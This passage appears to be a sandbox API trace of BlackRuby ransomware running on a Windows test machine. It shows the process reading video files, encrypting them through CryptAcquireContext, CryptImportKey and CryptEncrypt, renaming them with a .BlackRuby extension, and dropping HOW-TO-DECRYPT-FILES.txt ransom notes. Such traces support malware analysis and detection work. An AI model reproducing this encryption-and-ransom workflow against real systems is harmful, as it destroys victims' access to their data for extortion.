(uMode=0x1) returned 0x0 [0062.790] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\onhgnyolwe2y.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8eb4590, ftCreationTime.dwHighDateTime=0x1d34dcc, ftLastAccessTime.dwLowDateTime=0x5c0b4ef0, ftLastAccessTime.dwHighDateTime=0x1d35a43, ftLastWriteTime.dwLowDateTime=0x2d9dce60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x8fd0)) returned 1 [0062.790] GetLastError () returned 0xb7 [0062.790] SetErrorMode (uMode=0x0) returned 0x1 [0062.790] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ONHGNyoLwe2y.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\onhgnyolwe2y.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_OfhDUR5H7LaveppPnR4wIL4GGsaBkJsGslGPuSWsdRxMCC.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_ofhdur5h7lavepppnr4wil4ggsabkjsgslgpuswsdrxmcc.blackruby")) returned 1 [0062.791] GetLastError () returned 0xb7 [0062.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.791] GetLastError () returned 0xb7 [0062.791] SetErrorMode (uMode=0x1) returned 0x0 [0062.791] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.792] GetLastError () returned 0x5 [0062.792] SetErrorMode (uMode=0x0) returned 0x1 [0062.792] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW", lpFilePart=0x0) returned 0x46 [0062.793] GetLastError () returned 0x5 [0062.793] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0062.793] GetLastError () returned 0x5 [0062.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0062.793] GetLastError () returned 0x5 [0062.793] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW", lpFilePart=0x0) returned 0x46 [0062.793] GetLastError () returned 0x5 [0062.793] SetErrorMode (uMode=0x1) returned 0x0 [0062.793] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0062.793] GetLastError () returned 0x5 [0062.793] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.793] GetLastError () returned 0x5 [0062.793] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.793] GetLastError () returned 0x5 [0062.793] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.793] GetLastError () returned 0x5 [0062.793] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.793] GetLastError () returned 0x5 [0062.793] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.793] GetLastError () returned 0x5 [0062.793] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.793] GetLastError () returned 0x12 [0062.793] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0062.793] SetErrorMode (uMode=0x0) returned 0x1 [0062.794] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW", lpFilePart=0x0) returned 0x46 [0062.794] GetLastError () returned 0x12 [0062.794] SetErrorMode (uMode=0x1) returned 0x0 [0062.794] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0062.794] GetLastError () returned 0x12 [0062.794] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.794] GetLastError () returned 0x12 [0062.794] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.794] GetLastError () returned 0x12 [0062.794] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.794] GetLastError () returned 0x12 [0062.794] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.794] GetLastError () returned 0x12 [0062.794] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0062.794] GetLastError () returned 0x12 [0062.794] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0062.794] GetLastError () returned 0x12 [0062.794] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0062.794] SetErrorMode (uMode=0x0) returned 0x1 [0062.794] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", lpFilePart=0x0) returned 0x59 [0062.794] GetLastError () returned 0x12 [0062.794] SetErrorMode (uMode=0x1) returned 0x0 [0062.794] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\3d wih8amzevcy.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1c37b2c | out: lpFileInformation=0x1c37b2c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd830e0, ftCreationTime.dwHighDateTime=0x1d359b2, ftLastAccessTime.dwLowDateTime=0xfbbd1c10, ftLastAccessTime.dwHighDateTime=0x1d358a1, ftLastWriteTime.dwLowDateTime=0xfbbd1c10, ftLastWriteTime.dwHighDateTime=0x1d358a1, nFileSizeHigh=0x0, nFileSizeLow=0xb30a)) returned 1 [0062.794] GetLastError () returned 0x12 [0062.794] SetErrorMode (uMode=0x0) returned 0x1 [0062.795] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", lpFilePart=0x0) returned 0x59 [0062.795] GetLastError () returned 0x12 [0062.795] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", lpFilePart=0x0) returned 0x59 [0062.795] GetLastError () returned 0x12 [0062.795] SetErrorMode (uMode=0x1) returned 0x0 [0062.795] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\3d wih8amzevcy.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.795] GetLastError () returned 0x0 [0062.795] GetFileType (hFile=0x258) returned 0x1 [0062.795] SetErrorMode (uMode=0x0) returned 0x1 [0062.795] GetFileType (hFile=0x258) returned 0x1 [0062.795] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xb30a [0062.795] GetLastError () returned 0x0 [0062.795] ReadFile (in: hFile=0x258, lpBuffer=0x1c39974, nNumberOfBytesToRead=0xb30a, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1c39974*, lpNumberOfBytesRead=0x18ec40*=0xb30a, lpOverlapped=0x0) returned 1 [0062.796] GetLastError () returned 0x0 [0062.796] CloseHandle (hObject=0x258) returned 1 [0062.796] GetLastError () returned 0x0 [0062.796] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", lpFilePart=0x0) returned 0x59 [0062.796] GetLastError () returned 0x0 [0062.796] SetErrorMode (uMode=0x1) returned 0x0 [0062.796] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\3d wih8amzevcy.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd830e0, ftCreationTime.dwHighDateTime=0x1d359b2, ftLastAccessTime.dwLowDateTime=0xfbbd1c10, ftLastAccessTime.dwHighDateTime=0x1d358a1, ftLastWriteTime.dwLowDateTime=0xfbbd1c10, ftLastWriteTime.dwHighDateTime=0x1d358a1, nFileSizeHigh=0x0, nFileSizeLow=0xb30a)) returned 1 [0062.796] GetLastError () returned 0x0 [0062.796] SetErrorMode (uMode=0x0) returned 0x1 [0062.796] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c4e8) returned 1 [0062.797] GetLastError () returned 0x0 [0062.833] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1caa39c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360c20) returned 1 [0062.833] GetLastError () returned 0x0 [0062.833] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.833] GetLastError () returned 0x0 [0062.839] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.839] GetLastError () returned 0x0 [0062.839] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360e20) returned 1 [0062.839] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.839] GetLastError () returned 0x0 [0062.839] CryptSetKeyParam (hKey=0x360e20, dwParam=0x4, pbData=0x1cd73e8*=0x1, dwFlags=0x0) returned 1 [0062.839] GetLastError () returned 0x0 [0062.839] CryptSetKeyParam (hKey=0x360e20, dwParam=0x1, pbData=0x1cd73b4, dwFlags=0x0) returned 1 [0062.839] GetLastError () returned 0x0 [0062.839] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd7430*, pdwDataLen=0x18ec30*=0xb400, dwBufLen=0xb400 | out: pbData=0x1cd7430*, pdwDataLen=0x18ec30*=0xb400) returned 1 [0062.839] GetLastError () returned 0x0 [0062.839] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cedc5c*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1cedc5c*, pdwDataLen=0x18ec48*=0x10) returned 1 [0062.839] GetLastError () returned 0x0 [0062.839] CryptEncrypt (in: hKey=0x360e20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cedc8c*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1cedc8c*, pdwDataLen=0x18ec50*=0x10) returned 1 [0062.839] GetLastError () returned 0x0 [0062.840] CryptDestroyKey (hKey=0x360c20) returned 1 [0062.840] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.840] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.840] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", lpFilePart=0x0) returned 0x59 [0062.840] GetLastError () returned 0x0 [0062.840] SetErrorMode (uMode=0x1) returned 0x0 [0062.840] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\3d wih8amzevcy.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.842] GetLastError () returned 0xb7 [0062.842] GetFileType (hFile=0x258) returned 0x1 [0062.842] SetErrorMode (uMode=0x0) returned 0x1 [0062.842] GetFileType (hFile=0x258) returned 0x1 [0062.843] CloseHandle (hObject=0x258) returned 1 [0062.843] GetLastError () returned 0xb7 [0062.843] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv", lpFilePart=0x0) returned 0x59 [0062.843] GetLastError () returned 0xb7 [0062.843] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_53NejRmkBRArgKtxIpRYyTjVfM2hQTnW1Pgw6r.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_53NejRmkBRArgKtxIpRYyTjVfM2hQTnW1Pgw6r.BlackRuby", lpFilePart=0x0) returned 0x81 [0062.843] GetLastError () returned 0xb7 [0062.843] SetErrorMode (uMode=0x1) returned 0x0 [0062.843] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\3d wih8amzevcy.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd830e0, ftCreationTime.dwHighDateTime=0x1d359b2, ftLastAccessTime.dwLowDateTime=0xfbbd1c10, ftLastAccessTime.dwHighDateTime=0x1d358a1, ftLastWriteTime.dwLowDateTime=0x2da753e0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xb410)) returned 1 [0062.843] GetLastError () returned 0xb7 [0062.843] SetErrorMode (uMode=0x0) returned 0x1 [0062.843] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\3d wIH8amzEVcY.mkv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\3d wih8amzevcy.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\Encrypted_53NejRmkBRArgKtxIpRYyTjVfM2hQTnW1Pgw6r.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\encrypted_53nejrmkbrargktxipryytjvfm2hqtnw1pgw6r.blackruby")) returned 1 [0062.844] GetLastError () returned 0xb7 [0062.844] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5f [0062.844] GetLastError () returned 0xb7 [0062.844] SetErrorMode (uMode=0x1) returned 0x0 [0062.844] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.845] GetLastError () returned 0x0 [0062.845] GetFileType (hFile=0x258) returned 0x1 [0062.845] SetErrorMode (uMode=0x0) returned 0x1 [0062.845] GetFileType (hFile=0x258) returned 0x1 [0062.846] CloseHandle (hObject=0x258) returned 1 [0062.846] GetLastError () returned 0x0 [0062.846] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5f [0062.846] GetLastError () returned 0x0 [0062.846] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0062.847] GetLastError () returned 0x0 [0062.847] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", lpFilePart=0x0) returned 0x5a [0062.847] GetLastError () returned 0x0 [0062.847] SetErrorMode (uMode=0x1) returned 0x0 [0062.847] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\cpg35v6livzdz-2.flv"), fInfoLevelId=0x0, lpFileInformation=0x1d16154 | out: lpFileInformation=0x1d16154*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3436290, ftCreationTime.dwHighDateTime=0x1d35006, ftLastAccessTime.dwLowDateTime=0x2ab1e890, ftLastAccessTime.dwHighDateTime=0x1d357a1, ftLastWriteTime.dwLowDateTime=0x2ab1e890, ftLastWriteTime.dwHighDateTime=0x1d357a1, nFileSizeHigh=0x0, nFileSizeLow=0xb684)) returned 1 [0062.847] GetLastError () returned 0x0 [0062.847] SetErrorMode (uMode=0x0) returned 0x1 [0062.847] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", lpFilePart=0x0) returned 0x5a [0062.847] GetLastError () returned 0x0 [0062.847] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", lpFilePart=0x0) returned 0x5a [0062.847] GetLastError () returned 0x0 [0062.847] SetErrorMode (uMode=0x1) returned 0x0 [0062.847] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\cpg35v6livzdz-2.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.847] GetLastError () returned 0x0 [0062.847] GetFileType (hFile=0x258) returned 0x1 [0062.847] SetErrorMode (uMode=0x0) returned 0x1 [0062.847] GetFileType (hFile=0x258) returned 0x1 [0062.848] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xb684 [0062.848] GetLastError () returned 0x0 [0062.848] ReadFile (in: hFile=0x258, lpBuffer=0x1d1816c, nNumberOfBytesToRead=0xb684, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1d1816c*, lpNumberOfBytesRead=0x18ec40*=0xb684, lpOverlapped=0x0) returned 1 [0062.848] GetLastError () returned 0x0 [0062.848] CloseHandle (hObject=0x258) returned 1 [0062.849] GetLastError () returned 0x0 [0062.849] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv", lpFilePart=0x0) returned 0x5a [0062.849] GetLastError () returned 0x0 [0062.849] SetErrorMode (uMode=0x1) returned 0x0 [0062.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\PlKfwSADW\\CPG35V6livZdz-2.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\plkfwsadw\\cpg35v6livzdz-2.flv"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3436290, ftCreationTime.dwHighDateTime=0x1d35006, ftLastAccessTime.dwLowDateTime=0x2ab1e890, ftLastAccessTime.dwHighDateTime=0x1d357a1, ftLastWriteTime.dwLowDateTime=0x2ab1e890, ftLastWriteTime.dwHighDateTime=0x1d357a1, nFileSizeHigh=0x0, nFileSizeLow=0xb684)) returned 1 [0062.849] GetLastError () returned 0x0 [0062.849] SetErrorMode (uMode=0x0) returned 0x1 [0062.889] CryptImportKey (in: hProv=0x37c680, pbData=0x1b94b44, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360b60) returned 1 [0062.889] GetLastError () returned 0x0 [0062.889] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.889] GetLastError () returned 0x0 [0062.894] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.894] GetLastError () returned 0x0 [0062.894] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, 